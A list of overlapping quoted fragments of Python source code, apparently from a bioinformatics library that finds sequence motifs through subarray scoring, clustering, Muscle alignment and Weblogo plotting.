"pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering')",
"centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i",
"c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij)",
"% (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq",
"self.compute_p_value(score) if p <= p_value: yield orig_header, begin, end, p, subseq except Exception",
"'seqs': seqs} return True, motif else: return False, None def compute_motives(self, clusters, min_score=4,",
"for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq']",
"motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout =",
"self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time() - start_time logger.debug('...done in",
"= set(cluster_ids) for i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] +=",
"txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True):",
"pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs,",
"regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j, distances,",
"std if freq_th is None or freq >= freq_th: if std_th is None",
"(1 + np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid",
"2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp <",
"class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size",
"(delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def",
"extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th is None or",
"regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in trimmed_align_seqs: str_list = [c",
"float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys =",
"= self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th,",
"stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition =",
"motif else: return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200):",
"compute. Try more permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png'",
"block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components = self._decompose_header(header) orig_header, score, begin,",
"[] true_targets = [] for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time =",
"= Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer = clusterer",
"seq = '' for i, row in enumerate(cluster.T): c = Counter(row) k =",
"\"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs,",
"nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position')",
"return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores)",
"(fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show()",
"% e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs,",
"p in enumerate(results): loc_start_time = time.time() scores = p.get() scores_items += scores d_time",
"clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size =",
"\"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) + 1)",
"for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance",
"decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size,",
"fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores = [score for header,",
"if scores: xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a,",
"self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq in iterable: new_header = header",
"def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator =",
"- start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters = defaultdict(list) for pred,",
"n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async(",
"self.options = options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self,",
"row /= norm else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx =",
"tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is",
"sign = np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid()",
"None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix =",
"= ' - num co-occurences %d %s vs %d %s: %d' % \\",
"x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an",
"= subarray['begin'] end = subarray['end'] score = subarray['score'] header = orig_header header +=",
"pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds,",
"run the predictor to learn the new class definition logger.debug('After merge, %d motives'",
"if this alphabet is required # it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna',",
"reverse=True) success = False for rel_nw_score, i, j in ms: if motives.get(i, None)",
"i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids)",
"out[i + 1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers,",
"cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co",
"elif len(code) == 1: code_str = code[0] else: code_str = '(' + '|'.join(code)",
"closest instance j from any instance in i d_ij = [] for c_i",
"StringIO from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC",
"try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception",
"1 / (1 + np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit a",
"float(val) / dim >= min_freq: score += 1 trimmed_align_seqs = [] for h,",
"if len(sig) >= median_len: sigs = sigs + sig[:median_len] sig = np.array(sigs) /",
"= iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time =",
"size = len(haystack) return counts, float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\"",
"No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in clusters:",
"more permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname,",
"that # kmers dont interfere cluster_seqs = [] for cluster_id in clusters: if",
"regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n,",
"0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders",
"vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time = time.time()",
"= show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends",
"for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() seq +=",
"ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt",
"estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1]) if",
"cluster_id in motives] logos = dict() for cluster_id in ids: logo_image, logo_txt =",
"m = s + (e - s) / 2 locs.append(m) plt.figure(figsize=size) n, bins,",
"= [] for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common()",
"(time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items = [] for i, p",
"vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable =",
"len(sig) >= median_len: sigs = sig[:median_len] else: if len(sig) >= median_len: sigs =",
"- begin) / 2) cluster_ids = set(cluster_ids) for i in cluster_ids: for j",
"/= norm else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list)",
"figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives to report. Try more",
"= maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna':",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None,",
"exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores = [score",
"end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size =",
"from any instance in i d_ij = [] for c_i in centers[i]: for",
"\"\"\"merge.\"\"\" while True: ms = sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True)",
"return headers, data def _perform_ma(self, data): params = {'maxiters': 7} if self.diags is",
"plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname",
"estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion",
"[score for header, score, begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys",
"from collections import defaultdict from eden import apply_async import numpy as np from",
"(%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def",
"letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count in k: if",
"= [] for h, align_seq in trimmed_align_seqs: str_list = [c for c in",
"pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time",
"return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for",
"if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary: %d motives'",
"begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs,",
"motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary: %d motives' %",
"= subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' % (begin, end) header +=",
"return True else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200):",
"end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in",
"eden import apply_async import numpy as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray",
"logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None:",
"else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs,",
"min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield i",
"= match.end() m = s + (e - s) / 2 locs.append(m) plt.figure(figsize=size)",
"= Counter(row) k = c.most_common() seq += k[0][0] return seq def _compute_score(self, align_seqs,",
"= time.time() - start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters = defaultdict(list)",
"compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None: ids = [cluster_id",
"txt = [] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '###",
"sigs = sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig def",
"pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' %",
"y_pred))) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img",
"num occurrences of regex: %d' % (co) txt.append(info) info = ' - freq",
"# ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\" def",
"== 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator,",
"for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting')",
"regex: %d' % (co) txt.append(info) info = ' - freq of occurrences of",
"'No motives to report. Try more permissive parameters.') txt = '\\n'.join(txt) return txt",
"secs' % (time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for i, (p, n)",
"len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i +",
"< len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster = [] for h,",
"return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter,",
"min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs",
"wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' - num subarrays: %d' % len(motif['seqs'])",
"from scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b):",
"= '(' + '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster",
"self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: return True else:",
"= self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif",
"regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for m in self._identify_mergeable_clusters( motives,",
"this alphabet is required # it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein']",
"figname = None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len =",
"= np.vstack(cluster) score = 0 to_be_removed = [] for i, row in enumerate(cluster.T):",
"space that # kmers dont interfere cluster_seqs = [] for cluster_id in clusters:",
"header, seq in subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end, subseq =",
"vectorize the seqs and compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix",
"= show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label",
"max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters =",
"= Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders =",
"self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet",
"logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x -",
"vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for",
"regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count in k: if count /",
"(subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable,",
"vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time))",
"len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs =",
"def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = [] for h, align_seq",
"txt = [] if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' +",
"i in range(n): it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100,",
"pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' %",
"n_jobs=self.n_jobs) for header, seq in subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end,",
"self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator =",
"end, subseq = components p = self.compute_p_value(score) if p <= p_value: yield orig_header,",
"code += l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in",
"cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i, row in",
"= 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0] =",
"sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s)",
"n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer,",
"motives: regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq'] ds =",
"except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def",
"plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname:",
"+= subarrays_item d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d",
"motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs =",
"[apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)]",
"vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time",
"= match.end() m = s + (e - s) / 2 locs.append(m) if",
"c_j in centers[j]: if selected_abs == abs(c_i - c_j): selected = c_i -",
"motives) + 1 cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids =",
"= self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time() - start_time logger.debug('...done",
"= occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None,",
"estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def save(self, model_name):",
"Ignoring filter.') return motives else: logger.debug('After quality filter, %d motives' % len(_motives)) return",
"in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i, j in",
"i, n_i + n_j) logger.debug(info1 + info2) # update motives motives[i] = motif",
"def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size,",
"confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:')",
"evaluation') start_time = time.time() preds = [] binary_preds = [] true_targets = []",
"= output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for input sequences.\"\"\" # seperate",
"motives] seqs_summary = defaultdict(list) for seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin,",
"plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j))",
"else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if",
"joblib from scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a,",
"ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1): start = ids[i]",
"alphabet = 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits',",
"time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close()",
"from eden import apply_async import numpy as np from scipy.sparse import vstack from",
"(delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable,",
"in clusters: start_time = time.time() # align with muscle is_high_quality, motif = self.compute_motif(",
"id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield",
"for id in motives] seqs_summary = defaultdict(list) for seq_id, begin, end, i in",
"/ 2) cluster_ids = set(cluster_ids) for i in cluster_ids: for j in cluster_ids:",
"preds = [] binary_preds = [] true_targets = [] for i, (p, n)",
"start_time = time.time() scores_items = [] for i, p in enumerate(results): loc_start_time =",
"= wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format ==",
"align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq = '' for",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b =",
"fname) for logo_txt in logo_txts: txt.append(logo_txt) co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info",
"motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives,",
"x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends",
"auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit =",
"norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\"",
"vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1:",
"wrapper of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna',",
"len(align_seqs) cluster = [] for h, align_seq in align_seqs: str_list = [c for",
"n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else:",
"pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning: reverting to",
"np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid() plt.xlabel('Position') plt.ylabel('Importance",
"header += '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' % (score) header +=",
"= estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def save(self,",
"(i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs",
"self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time() - start_time logger.debug('...done in %.2f",
"tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags",
"import StringIO from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import",
"secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = [] for",
"= curve_fit(sigmoid, xs, ys) self.a, self.b = popt else: logger.debug('Warning: reverting to default",
"def _decompose_header(self, header): score = header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin,",
"for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info =",
"= plt.hist( ds, nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i,",
"lines: if line: if line[0] == '>': if seq: yield seq seq =",
"'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet",
"= self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt else:",
"pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup",
"in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time =",
"compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator",
"= n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator",
"seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score",
"self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class",
"time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' %",
"n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity",
"a in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs",
"haystack: for match in re.finditer(needle, s): s = match.start() e = match.end() m",
"= self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq =",
"a cluster with enough space that # kmers dont interfere cluster_seqs = []",
"nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i) +",
"id: %d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname =",
"start_time = time.time() matrices = [] for i, p in enumerate(results): loc_start_time =",
"end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer,",
"code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches = re.findall(needle,",
